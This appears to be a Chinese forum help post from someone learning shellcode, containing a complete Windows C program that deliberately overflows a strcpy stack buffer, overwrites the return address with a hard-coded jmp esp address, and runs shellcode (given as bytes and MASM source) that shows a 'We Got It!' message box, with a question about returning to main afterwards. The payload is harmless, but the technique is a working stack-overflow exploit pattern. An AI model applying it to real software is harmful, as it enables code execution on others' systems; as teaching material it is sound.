【求助】学习shellcode遇到一个问题,高手帮忙啊~!
#include <string.h>
#include <stdio.h>
#include <windows.h>
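/*
 * Value written over MyCopy()'s saved return address: 0x77D85928, stored
 * little-endian.  The macro name suggests a `jmp esp` gadget inside a system
 * DLL of the author's Windows build; it is build-specific and has to be
 * re-found on any other machine (NOTE(review): cannot be verified from here).
 * Exactly 4 address bytes plus the terminating NUL.  The pasted listing had a
 * stray space inside the literal, i.e. a 5th byte 0x20; it has been removed.
 */
#define JUMPESP "\x28\x59\xD8\x77"
unsigned char eip[8] = JUMPESP;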
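/*
 * x86 (32-bit) payload, 175 bytes, containing no 0x00 byte so that the
 * strcpy() in main() copies it whole.  It builds "user32.dll", "Success" and
 * "We Got It!" in stack scratch space and then calls, by hard-coded absolute
 * address (valid only on the author's Windows build, see the MASM source
 * further down):
 *   LoadLibrary("user32.dll")                     0x7C801D77
 *   MessageBoxA(0, "We Got It!", "Success", 0)    0x77D504EA
 *   ExitProcess(0)                                0x7C81CAA2
 * One string literal per instruction; the MASM listing is the readable form.
 *
 * Repairs relative to the pasted listing:
 *  - every literal carried a stray trailing space (an extra 0x20 byte between
 *    instructions), now removed;
 *  - the "user32.dll" stores jumped from [ebp-20h] to [ebp-19h] (hex/decimal
 *    slip), leaving 6 uninitialised bytes inside the name; ".dll" and its NUL
 *    now follow "user32" contiguously at [ebp-1Fh..ebp-1Bh].  main() loading
 *    user32.dll itself is probably what kept the demo working despite this.
 *  - the 'd' store was written "\xE" (one hex digit); it is now "\xE2".
 */
unsigned char exploit[] =
{
    "\x60"                  /* pushad                                   */
    "\x8B\xEC"              /* mov  ebp, esp                            */
    "\x83\xEC\x54"          /* sub  esp, 54h      ; scratch for strings */
    "\x33\xC9"              /* xor  ecx, ecx      ; cl = 0 = NUL source */
    /* "user32.dll\0" at [ebp-25h] */
    "\xC6\x45\xDB\x75"      /* mov  byte ptr [ebp-25h], 'u'             */
    "\xC6\x45\xDC\x73"      /* mov  byte ptr [ebp-24h], 's'             */
    "\xC6\x45\xDD\x65"      /* mov  byte ptr [ebp-23h], 'e'             */
    "\xC6\x45\xDE\x72"      /* mov  byte ptr [ebp-22h], 'r'             */
    "\xC6\x45\xDF\x33"      /* mov  byte ptr [ebp-21h], '3'             */
    "\xC6\x45\xE0\x32"      /* mov  byte ptr [ebp-20h], '2'             */
    "\xC6\x45\xE1\x2E"      /* mov  byte ptr [ebp-1Fh], '.'             */
    "\xC6\x45\xE2\x64"      /* mov  byte ptr [ebp-1Eh], 'd'             */
    "\xC6\x45\xE3\x6C"      /* mov  byte ptr [ebp-1Dh], 'l'             */
    "\xC6\x45\xE4\x6C"      /* mov  byte ptr [ebp-1Ch], 'l'             */
    "\x88\x4D\xE5"          /* mov  byte ptr [ebp-1Bh], cl  ; NUL       */
    "\x8D\x45\xDB"          /* lea  eax, [ebp-25h]                      */
    "\x50"                  /* push eax           ; lpLibFileName       */
    "\xB8\x77\x1D\x80\x7C"  /* mov  eax, 7C801D77h ; LoadLibrary        */
    "\xFF\xD0"              /* call eax                                 */
    /* The following four instructions open a second frame.  They are NOT
     * in the MASM source on this page; the two listings are out of sync.
     * From here on [ebp-xx] refers to this new frame. */
    "\x55"                  /* push ebp                                 */
    "\x51"                  /* push ecx                                 */
    "\x8B\xEC"              /* mov  ebp, esp                            */
    "\x83\xEC\x54"          /* sub  esp, 54h                            */
    "\x33\xC9"              /* xor  ecx, ecx      ; ecx is volatile across the call */
    /* "Success\0" at [ebp-14h]  (caption) */
    "\xC6\x45\xEC\x53"      /* mov  byte ptr [ebp-14h], 'S'             */
    "\xC6\x45\xED\x75"      /* mov  byte ptr [ebp-13h], 'u'             */
    "\xC6\x45\xEE\x63"      /* mov  byte ptr [ebp-12h], 'c'             */
    "\xC6\x45\xEF\x63"      /* mov  byte ptr [ebp-11h], 'c'             */
    "\xC6\x45\xF0\x65"      /* mov  byte ptr [ebp-10h], 'e'             */
    "\xC6\x45\xF1\x73"      /* mov  byte ptr [ebp-0Fh], 's'             */
    "\xC6\x45\xF2\x73"      /* mov  byte ptr [ebp-0Eh], 's'             */
    "\x88\x4D\xF3"          /* mov  byte ptr [ebp-0Dh], cl  ; NUL       */
    /* "We Got It!\0" at [ebp-0Ch]  (text) */
    "\xC6\x45\xF4\x57"      /* mov  byte ptr [ebp-0Ch], 'W'             */
    "\xC6\x45\xF5\x65"      /* mov  byte ptr [ebp-0Bh], 'e'             */
    "\xC6\x45\xF6\x20"      /* mov  byte ptr [ebp-0Ah], ' '             */
    "\xC6\x45\xF7\x47"      /* mov  byte ptr [ebp-09h], 'G'             */
    "\xC6\x45\xF8\x6F"      /* mov  byte ptr [ebp-08h], 'o'             */
    "\xC6\x45\xF9\x74"      /* mov  byte ptr [ebp-07h], 't'             */
    "\xC6\x45\xFA\x20"      /* mov  byte ptr [ebp-06h], ' '             */
    "\xC6\x45\xFB\x49"      /* mov  byte ptr [ebp-05h], 'I'             */
    "\xC6\x45\xFC\x74"      /* mov  byte ptr [ebp-04h], 't'             */
    "\xC6\x45\xFD\x21"      /* mov  byte ptr [ebp-03h], '!'             */
    "\x88\x4D\xFE"          /* mov  byte ptr [ebp-02h], cl  ; NUL       */
    /* MessageBoxA(hWnd, lpText, lpCaption, uType): args pushed right-to-left */
    "\x51"                  /* push ecx           ; uType = 0 (MB_OK)   */
    "\x8D\x45\xEC"          /* lea  eax, [ebp-14h]                      */
    "\x50"                  /* push eax           ; lpCaption "Success" */
    "\x8D\x45\xF4"          /* lea  eax, [ebp-0Ch]                      */
    "\x50"                  /* push eax           ; lpText "We Got It!" */
    "\x51"                  /* push ecx           ; hWnd = NULL         */
    "\xB8\xEA\x04\xD5\x77"  /* mov  eax, 77D504EAh ; MessageBoxA        */
    "\xFF\xD0"              /* call eax                                 */
    /* ExitProcess(0): the process ends here, nothing after it runs     */
    "\x33\xDB"              /* xor  ebx, ebx                            */
    "\x53"                  /* push ebx           ; uExitCode = 0       */
    "\xB8\xA2\xCA\x81\x7C"  /* mov  eax, 7C81CAA2h ; ExitProcess        */
    "\xFF\xD0"              /* call eax                                 */
    /* Unreachable; and with the second frame above, this popad would pop
     * the pushed ecx/ebp rather than the pushad image anyway.           */
    "\x8B\xE5"              /* mov  esp, ebp                            */
    "\x61"                  /* popad                                    */
};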
/*
 * Deliberately vulnerable sink for the demo: copies str into a 50-byte stack
 * buffer with no length check, so any input longer than the buffer plus the
 * compiler's padding and the saved EBP overwrites MyCopy's own return address.
 * main() relies on that return address sitting 56 bytes past the start of
 * buff1 (56 filler bytes, then the 4-byte eip) -- a property of the author's
 * compiler and options, so verify it in a debugger before touching this
 * function: even an added local or a different optimisation level can move it.
 * Never use strcpy on untrusted input outside a demo like this one.
 * Always returns 1 (when it returns normally at all).
 */
int MyCopy( char* str )
{
char buff1[50];
strcpy(buff1,str);   /* the overflow: no bound on str */
return 1;
}
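/*
 * Builds the overflow string and hands it to MyCopy():
 *   Buff[0..55]   0x90 filler (covers buff1, its padding and the saved EBP)
 *   Buff[56..59]  new return address (eip / JUMPESP)
 *   Buff[60..]    the shellcode, NUL-terminated by its array initialiser
 * If JUMPESP really is a `jmp esp` gadget, ESP after the `ret` points at
 * Buff[60]'s copy, i.e. straight at the payload.  The offsets 56/60 are tied
 * to MyCopy()'s frame layout on the author's compiler; re-check them in a
 * debugger if anything about MyCopy or the build changes.
 *
 * Returns 0 only if control ever comes back; with this payload it does not,
 * because the shellcode ends in ExitProcess.  This also answers the question
 * asked below: the overflow destroys MyCopy's frame and return address, so
 * there is nothing to "return" to unless the shellcode itself rebuilds ESP
 * and jumps back into main -- which this payload does not attempt.
 *
 * The string literals in the pasted listing carried stray spaces before the
 * closing quotes ("user32.dll ", "cann 't ..."); they are restored here.
 */
int main()
{
    HINSTANCE u32 = NULL;
    char Buff[1024];
    int i;

    /* The shellcode also loads user32.dll itself.  Loading it here mirrors
     * the author's setup and is likely what makes MessageBoxA reachable at
     * its hard-coded address even if the shellcode's own LoadLibrary fails.
     * Failure is reported but the demo continues, as in the original. */
    u32 = LoadLibrary("user32.dll");
    if (u32 == NULL)
    {
        printf("can't load user32.dll");
    }

    memset(Buff, 0, sizeof(Buff));
    for (i = 0; i < 56; i++)
    {
        Buff[i] = 0x90;                 /* filler up to the saved return address */
    }
    strcpy(Buff + 56, (char *)eip);     /* 4 address bytes; its NUL lands at 60 and is overwritten next */
    strcpy(Buff + 60, (char *)exploit); /* payload must contain no 0x00 byte for strcpy to copy it whole */

    MyCopy(Buff);                       /* overflows buff1[50]; does not return when the payload runs */
    printf("\n successed \n");
    return 0;
}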
//shellcode汇编源码=======================================================
.386
.model flat,stdcall
option casemap:none
include d:\masm32\hd.h
.code
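; ---------------------------------------------------------------------------
; Shellcode source (MASM, x86-32, Intel syntax).  Its assembled bytes are the
; exploit[] array in the C listing above; keep the two in sync.
; Entry: reached through the overwritten return address (ESP points here).
; Calls three Win32 functions by absolute address -- valid only on the
; author's Windows build; re-resolve them on any other machine.
;
; Repairs relative to the pasted listing:
;  - two-character literals such as 'u ' (a stray space from the paste) are
;    single characters again;
;  - the "user32.dll" stores jumped from [ebp-20h] to [ebp-19h] (hex/decimal
;    slip), leaving 6 uninitialised bytes inside the name; ".dll" and its NUL
;    now follow "user32" contiguously at [ebp-1Fh..ebp-1Bh];
;  - the 'W' store at [ebp-0Ch] was missing (it is present in exploit[] as
;    C6 45 F4 57), so lpText started with an uninitialised byte.
; ---------------------------------------------------------------------------
start:
    pushad                              ; save caller registers
    mov     ebp, esp
    sub     esp, 54h                    ; 84 bytes of scratch for the three strings
    xor     ecx, ecx                    ; cl = 0 is the NUL terminator source

    ; "user32.dll\0" at [ebp-25h]
    mov     byte ptr [ebp-25h], 'u'
    mov     byte ptr [ebp-24h], 's'
    mov     byte ptr [ebp-23h], 'e'
    mov     byte ptr [ebp-22h], 'r'
    mov     byte ptr [ebp-21h], '3'
    mov     byte ptr [ebp-20h], '2'
    mov     byte ptr [ebp-1Fh], '.'
    mov     byte ptr [ebp-1Eh], 'd'
    mov     byte ptr [ebp-1Dh], 'l'
    mov     byte ptr [ebp-1Ch], 'l'
    mov     byte ptr [ebp-1Bh], cl      ; NUL

    lea     eax, [ebp-25h]
    push    eax                         ; lpLibFileName = "user32.dll"
    mov     eax, 07c801d77h             ; LoadLibrary (author's kernel32 build)
    call    eax                         ; stdcall: callee pops the argument
    xor     ecx, ecx                    ; ecx is volatile across the call; re-zero
    ; NOTE(review): exploit[] in the C listing emits push ebp / push ecx /
    ; mov ebp,esp / sub esp,54h at this point; this source does not.  The two
    ; listings were not produced from the same text.

    ; "Success\0" at [ebp-14h]  (lpCaption)
    mov     byte ptr [ebp-14h], 'S'
    mov     byte ptr [ebp-13h], 'u'
    mov     byte ptr [ebp-12h], 'c'
    mov     byte ptr [ebp-11h], 'c'
    mov     byte ptr [ebp-10h], 'e'
    mov     byte ptr [ebp-0Fh], 's'
    mov     byte ptr [ebp-0Eh], 's'
    mov     byte ptr [ebp-0Dh], cl      ; NUL

    ; "We Got It!\0" at [ebp-0Ch]  (lpText)
    mov     byte ptr [ebp-0Ch], 'W'     ; was missing from the pasted source
    mov     byte ptr [ebp-0Bh], 'e'
    mov     byte ptr [ebp-0Ah], ' '
    mov     byte ptr [ebp-9], 'G'
    mov     byte ptr [ebp-8], 'o'
    mov     byte ptr [ebp-7], 't'
    mov     byte ptr [ebp-6], ' '
    mov     byte ptr [ebp-5], 'I'
    mov     byte ptr [ebp-4], 't'
    mov     byte ptr [ebp-3], '!'
    mov     byte ptr [ebp-2], cl        ; NUL

    ; MessageBoxA(hWnd, lpText, lpCaption, uType): arguments pushed right-to-left
    push    ecx                         ; uType = 0 (MB_OK)
    lea     eax, [ebp-14h]
    push    eax                         ; lpCaption = "Success"
    lea     eax, [ebp-0Ch]
    push    eax                         ; lpText = "We Got It!"
    push    ecx                         ; hWnd = NULL
    mov     eax, 077d504eah             ; MessageBoxA (author's user32 build)
    call    eax

    ; ExitProcess(0): the process ends here; nothing below ever runs
    xor     ecx, ecx
    push    ecx                         ; uExitCode = 0
    mov     eax, 07c81caa2h             ; ExitProcess (author's kernel32 build)
    call    eax

    ; Unreachable.  Even without ExitProcess there is no frame to return into:
    ; the overflow replaced MyCopy's saved return address with the address of
    ; this code.  The epilogue is kept so the bytes match exploit[] (8B E5 61).
    mov     esp, ebp                    ; discard the scratch area
    popad
end start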
==========================================================================
//一个简单的缓冲区溢出,溢出成功后显示一个messagebox.
当溢出成功后,如何返回到main函数中继续后面的执行呢?
留个qq:406670611
[解决办法]
《Shellcoder编程揭秘》